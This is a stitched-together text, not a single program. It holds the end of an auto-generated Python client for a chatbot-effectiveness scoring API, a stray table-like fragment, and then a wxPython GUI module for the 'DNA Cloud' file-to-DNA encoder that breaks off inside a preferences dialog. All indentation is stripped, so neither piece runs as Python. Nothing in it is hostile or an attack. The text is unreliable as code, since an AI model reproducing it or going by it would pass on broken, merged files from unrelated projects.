raise ApiValueError("Missing the required parameter `conversation` when calling `score_chatbot_conversation`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'conversation' in local_var_params:
body_params = local_var_params['conversation']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['sentim_auth'] # noqa: E501
return self.api_client.call_api(
'/chatbot_effectiveness/batch', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ConversationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def score_chatbot_effect(self, conversation, **kwargs): # noqa: E501
"""Score the effectiveness of the last chatbot message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, score the chatbot's response (the second to last message) based on whether or not the user's emotion matches what we expect. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.score_chatbot_effect(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: float
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.score_chatbot_effect_with_http_info(conversation, **kwargs) # noqa: E501
def score_chatbot_effect_with_http_info(self, conversation, **kwargs): # noqa: E501
"""Score the effectiveness of the last chatbot message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, score the chatbot's response (the second to last message) based on whether or not the user's emotion matches what we expect. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.score_chatbot_effect_with_http_info(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(float, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['conversation'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method score_chatbot_effect" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'conversation' is set
if ('conversation' not in local_var_params or
local_var_params['conversation'] is None):
raise ApiValueError("Missing the required parameter `conversation` when calling `score_chatbot_effect`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'conversation' in local_var_params:
body_params = local_var_params['conversation']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['sentim_auth'] # noqa: E501
return self.api_client.call_api(
'/chatbot_effectiveness/single', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='float', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
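# Usage sketch (illustrative only; the api object construction is assumed, not
# confirmed by this file): as described in each docstring above, passing
# async_req=True makes the call return a thread-like object whose .get()
# blocks until the result is available.
#
#     thread = api.detect_emotion_conversation(conversation, async_req=True)
#     result = thread.get()  # a BatchEmotionResponse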
] | null | null | null | # -*- coding: utf-8 -*-
"""
#########################################################################
Author: Shalin Shah
Project: DNA Cloud
Graduate Mentor: Dixita Limbachya
Mentor: Prof. Manish K Gupta
Date: 5 November 2013
Website: www.guptalab.org/dnacloud
This module contains both the panels for encoding and decoding.
#########################################################################
"""
import sys
from PIL import Image
if "win" in sys.platform:
from PIL import PngImagePlugin
import unicodedata
import barcodeGenerator
import math
import os
import sqlite3
import sqlite3 as lite
import wx
import extraModules
import multiprocessing
import time
from datetime import datetime
import shutil
import threading
CHUNK_SIZE = 1000000
if hasattr(sys, "frozen"):
PATH = os.path.dirname(sys.executable)
else:
PATH = os.path.dirname(os.path.abspath(__file__))
#print PATH , "panels"
FILE_EXT = '.dnac'
if "win" in sys.platform and not "darwin" in sys.platform:
BARCODE_HEIGHT = 96
BARCODE_WIDTH = 470
elif "linux" in sys.platform or 'darwin' in sys.platform:
BARCODE_HEIGHT = 96
BARCODE_WIDTH = 600
FOLDER_DISCLAIMER = "It is not mandatory to select a default folder. If you don't, then every time you save a .dnac file you will be asked for a save location."
PREF_DISCLAIMER = "Disclaimer: Please note that these details will be used by bio companies to identify the user of the DNA strings; hence they are mandatory."
HEADER_TEXT = "Please select the workspace you would like to work in. All your files (including temporary files) will be stored in this working directory; it can also be changed later from Preferences."
SOFTWARE_DETAILS = "\n\n Version 1.0\n\n Visit us at www.guptalab.org/dnacloud\n\n Contact us at dnacloud@guptalab.org"
class encodePanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent = parent,style = wx.TAB_TRAVERSAL)
self.vBox1 = wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self ,label = "DNA-ENCODER",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(pointSize = 19, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
else:
font = wx.Font(pointSize = 14, family = wx.DEFAULT,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
self.vBox1.Add(head ,flag = wx.ALIGN_CENTER | wx.TOP | wx.LEFT , border = 10)
# Layout of the basic GUI text and TextCtrl panels, along with the Save to Database and Discard button options
head = wx.StaticText(self ,label = "Encode data file into DNA String",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line1 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose file",size = (150,30))
self.hBox1.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT , border = 10)
path = wx.StaticText(self, label = "Select any data file (audio, video, doc etc.) from your computer")
self.hBox1.Add(path,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT , border = 20)
self.vBox1.Add(self.hBox1)
head = wx.StaticText(self,label = "Details (approx.)")
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line2 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " File Selected : ",style = wx.ALIGN_CENTRE)
self.txt = wx.TextCtrl(self,name = "hBox",size = (500,25),style= wx.TE_READONLY)
self.hBox.Add(path,2 ,flag = wx.EXPAND)
self.hBox.Add(self.txt, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Lenght Of DNA String : " , style = wx.ALIGN_CENTRE)
self.txt2 = wx.TextCtrl(self,name = "hBox3",size = (300,25),style= wx.TE_READONLY)
self.hBox2.Add(content1, 2, flag = wx.EXPAND)
self.hBox2.Add(self.txt2, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox2,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Number of DNA Chunks : " , style = wx.ALIGN_CENTRE)
self.txt3 = wx.TextCtrl(self,name = "hBox3",size = (300,25),style= wx.TE_READONLY)
self.hBox3.Add(content1, 2, flag = wx.EXPAND)
self.hBox3.Add(self.txt3, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox3,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox4 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Length of each DNA Chunk : ", style = wx.ALIGN_CENTRE)
self.txt4 = wx.TextCtrl(self,name = "hBox4",size = (300,25),style= wx.TE_READONLY)
self.hBox4.Add(content1, 2, flag = wx.EXPAND)
self.hBox4.Add(self.txt4, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox4,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox5 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " File Size (Bytes) : " , style = wx.ALIGN_CENTRE)
self.txt5 = wx.TextCtrl(self,name = "hBox5",size = (300,25),style= wx.TE_READONLY)
self.hBox5.Add(content1, 2, flag = wx.EXPAND)
self.hBox5.Add(self.txt5, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox5,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
#There is nothing like self.txt1
"""
head = wx.StaticText(self,label = "Encoded DNA String")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox9 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = "DNA String : ", style = wx.ALIGN_CENTRE)
self.but9 = wx.Button(self,label = "View DNA String")
content1.SetFont(font)
self.hBox9.Add(content1 ,flag = wx.LEFT ,border = 20)
self.hBox9.Add(self.but9 ,flag = wx.EXPAND | wx.LEFT , border = 180)
self.vBox1.Add(self.hBox9 ,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox10 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = "DNA String List with Error Checks : ", style = wx.ALIGN_CENTRE)
self.but10 = wx.Button(self,label = "View DNA Chunks")
font = wx.Font(9 , wx.DEFAULT, wx.NORMAL, wx.BOLD)
content1.SetFont(font)
self.hBox10.Add(content1 ,flag = wx.LEFT ,border = 20)
self.hBox10.Add(self.but10 ,flag = wx.EXPAND)
self.vBox1.Add(self.hBox10 ,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
"""
self.hBox11 = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label = "Encode your File",size = (160,30))
self.discardBut = wx.Button(self,label = "Reset file Selected",size = (160,30))
self.hBox11.Add(self.saveBut, flag = wx.EXPAND | wx.LEFT , border = 20)
self.hBox11.Add(self.discardBut, flag = wx.EXPAND | wx.LEFT ,border = 20)
self.vBox1.Add(self.hBox11 ,flag = wx.TOP | wx.BOTTOM ,border = 10)
"""
self.clearDB = wx.Button(self,label = "Clear Database")
self.hBox11.Add(self.clearDB ,flag = wx.EXPAND)
head = wx.StaticText(self,label = "© QR Code generated for given User Details")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
img = wx.EmptyImage(240,240)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox1.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.BOTTOM , border = 25)
"""
self.dummyhBox = wx.BoxSizer(wx.VERTICAL)
self.vBox1.Add(self.dummyhBox, 2, wx.EXPAND)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND)
self.hBox12 = wx.BoxSizer(wx.HORIZONTAL)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.Image(name = PATH + '/../icons/DNAicon.png').ConvertToBitmap())
self.hBox12.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.TOP | wx.BOTTOM , border = 25)
self.v1Box= wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self,label = "DNA-CLOUD")
font = wx.Font(11, wx.DEFAULT, wx.NORMAL, wx.BOLD,underline = True)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.TOP | wx.LEFT,border = 25)
head = wx.StaticText(self,label = SOFTWARE_DETAILS)
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.LEFT | wx.EXPAND , border = 20)
self.hBox12.Add(self.v1Box)
self.vBox1.Add(self.hBox12,flag = wx.ALIGN_BOTTOM)
self.SetSizer(self.vBox1)
class decodePanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent = parent,style = wx.TAB_TRAVERSAL)
self.vBox2 = wx.BoxSizer(wx.VERTICAL)
self.vBox2 = wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self ,label = "DNA-DECODER",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(pointSize = 19, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
else:
font = wx.Font(pointSize = 14, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.ALIGN_CENTER | wx.LEFT | wx.TOP , border = 10)
head = wx.StaticText(self ,label = "Generate data file from already encoded DNA files",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT, border = 10)
line2 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
"""
self.cb = wx.ComboBox(self,size=(800,30) ,style=wx.CB_READONLY)
self.vBox2.Add(self.cb,flag = wx.TOP | wx.LEFT | wx.RIGHT , border = 10)
"""
self.hBox23 = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " File Selected : ",style = wx.ALIGN_CENTRE)
self.txt = wx.TextCtrl(self,name = "hBox",style= wx.TE_READONLY)
self.hBox23.Add(path, 2, flag = wx.EXPAND)
self.hBox23.Add(self.txt, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox23,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox24 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Length of DNA String (approx.) : " , style = wx.ALIGN_CENTRE)
self.txt2 = wx.TextCtrl(self,name = "hBox3",style= wx.TE_READONLY)
self.hBox24.Add(content1, 2, flag = wx.EXPAND)
self.hBox24.Add(self.txt2, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox24,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox25 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Number of DNA Chunks (approx.) : " , style = wx.ALIGN_CENTRE)
self.txt3 = wx.TextCtrl(self,name = "hBox3",style= wx.TE_READONLY)
self.hBox25.Add(content1, 2, flag = wx.EXPAND)
self.hBox25.Add(self.txt3, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox25,flag = wx.EXPAND | wx.TOP , border = 10)
self.hBox26 = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Select .dnac File ",size = (160,30))
self.hBox26.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT , border = 20)
self.decodeBut1 = wx.Button(self,label = "Decode selected File ",size = (160,30))
self.hBox26.Add(self.decodeBut1,flag = wx.EXPAND | wx.LEFT , border = 20)
self.vBox2.Add(self.hBox26,flag = wx.TOP | wx.BOTTOM, border = 15)
head = wx.StaticText(self ,label = "Try DNA String just for fun",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line1 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox21 = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Please Write DNA String :", style = wx.ALIGN_CENTRE)
self.txt21 = wx.TextCtrl(self,name = "hBox")
self.hBox21.Add(path, 2,flag = wx.EXPAND)
self.hBox21.Add(self.txt21, 8,flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox21 , flag = wx.EXPAND)
self.hBox22 = wx.BoxSizer(wx.HORIZONTAL)
self.decodeBut = wx.Button(self,label = "Decode",size = (150,30))
self.resetBut = wx.Button(self,label = "Reset",size = (150,30))
self.hBox22.Add(self.decodeBut ,flag = wx.LEFT ,border = 20)
self.hBox22.Add(self.resetBut ,flag = wx.EXPAND | wx.LEFT , border = 20)
self.vBox2.Add(self.hBox22 ,flag = wx.EXPAND | wx.TOP | wx.ALIGN_CENTER, border = 15)
"""
head = wx.StaticText(self,label = "© QR Code generated for given User Details")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
img = wx.EmptyImage(240,240)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox2.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.BOTTOM ,border = 25)
"""
self.dummyhBox = wx.BoxSizer(wx.VERTICAL)
self.vBox2.Add(self.dummyhBox, 2, wx.EXPAND)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line3, flag = wx.EXPAND)
self.hBox27 = wx.BoxSizer(wx.HORIZONTAL)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.Image(name = PATH + '/../icons/DNAicon.png').ConvertToBitmap())
self.hBox27.Add(self.imageCtrl,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.TOP | wx.BOTTOM, border = 25)
self.v1Box= wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self,label = "DNA-CLOUD")
font = wx.Font(11, wx.DEFAULT, wx.NORMAL, wx.BOLD, underline = True)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT | wx.TOP,border = 25)
head = wx.StaticText(self,label = SOFTWARE_DETAILS)
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT , border = 20)
self.hBox27.Add(self.v1Box)
self.vBox2.Add(self.hBox27)
self.SetSizer(self.vBox2)
class Preferences(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
self.WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
#print self.WORKSPACE_PATH
if "linux" in sys.platform:
self.WORKSPACE_PATH = unicodedata.normalize('NFKD', self.WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(self.WORKSPACE_PATH + '/barcode'):
os.mkdir(self.WORKSPACE_PATH + '/barcode')
if con:
con.close()
if "win" in sys.platform and not 'darwin' in sys.platform:
"""
head = wx.StaticText(self ,label = "Select Your Default Folder",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line4 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line4, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxf = wx.BoxSizer(wx.HORIZONTAL)
self.txtf = wx.TextCtrl(self,name = "hBox")
self.hBoxf.Add(self.txtf,proportion = 9 ,flag = wx.EXPAND |wx.RIGHT | wx.LEFT, border = 10)
self.browBut = wx.Button(self,label=" Browse ")
self.hBoxf.Add(self.browBut,proportion = 2,flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 7)
self.vBox.Add(self.hBoxf , flag = wx.TOP | wx.BOTTOM , border = 7)
head = wx.StaticText(self ,label = FOLDER_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
"""
head = wx.StaticText(self ,label = "Enter your details",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Full Name : \t\t\t\t\t\t\t ", style = wx.ALIGN_CENTRE)
self.hBoxa.Add(path, 3, wx.EXPAND)
self.txta = wx.TextCtrl(self,name = "hBox")
self.hBoxa.Add(self.txta, 8, flag = wx.EXPAND | wx.RIGHT , border = 5)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Mobile Number : \t\t\t\t\t", style = wx.ALIGN_CENTRE)
self.hBoxc.Add(path, 3,flag = wx.EXPAND)
self.txtc = wx.TextCtrl(self,name = "hBox")
self.hBoxc.Add(self.txtc, 8,flag = wx.EXPAND | wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Email Address : \t\t\t\t\t ", style = wx.ALIGN_CENTRE)
self.hBoxd.Add(path, 3,flag = wx.EXPAND)
self.txtd = wx.TextCtrl(self,name = "hBox")
self.hBoxd.Add(self.txtd, 8,flag = wx.EXPAND | wx.RIGHT , border = 5)
self.vBox.Add(self.hBoxd, flag = wx.TOP | wx.BOTTOM, border = 7)
self.hBoxb = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = "File Name (e.g. a.mkv.dnac): ", style = wx.ALIGN_CENTRE)
self.hBoxb.Add(path,proportion = 2,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtb = wx.TextCtrl(self,name = "hBox")
self.hBoxb.Add(self.txtb,proportion = 5 ,flag = wx.EXPAND |wx.RIGHT, border = 10)
self.vBox.Add(self.hBoxb , flag = wx.TOP | wx.BOTTOM , border = 7)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
try:
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
except IOError:
#"""Permission Error"""
#wx.MessageDialog(self,'Permission Denied. Please start the software in administrator mode.', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
#sys.exit(0)
shutil.copyfile(PATH + '/../icons/barcode.png',self.WORKSPACE_PATH + '/barcode/barcode.png')
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
if not os.path.isdir(self.WORKSPACE_PATH + '/.temp'):
os.mkdir(self.WORKSPACE_PATH +'/.temp')
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox.Add(self.imageCtrl,flag = wx.LEFT | wx.RIGHT |wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = PREF_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.barcodeBut = wx.Button(self,label=" Generate Barcode ")
self.cancelBut = wx.Button(self,label=" Close ")
self.hBoxe.Add(self.saveBut, flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.barcodeBut, flag = wx.RIGHT | wx.LEFT , border = 10)
self.hBoxe.Add(self.cancelBut, flag = wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.TOP | wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTRE_VERTICAL |wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform or 'darwin' in sys.platform:
"""
head = wx.StaticText(self ,label = "Select Your Default Folder",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line4 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line4, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxf = wx.BoxSizer(wx.HORIZONTAL)
self.txtf = wx.TextCtrl(self,name = "hBox")
self.hBoxf.Add(self.txtf,proportion = 9 ,flag = wx.EXPAND |wx.RIGHT | wx.LEFT, border = 10)
self.browBut = wx.Button(self,label=" Browse ")
self.hBoxf.Add(self.browBut,proportion = 2,flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 7)
self.vBox.Add(self.hBoxf , flag = wx.TOP | wx.BOTTOM , border = 7)
head = wx.StaticText(self ,label = FOLDER_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
"""
head = wx.StaticText(self ,label = "Enter your details",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
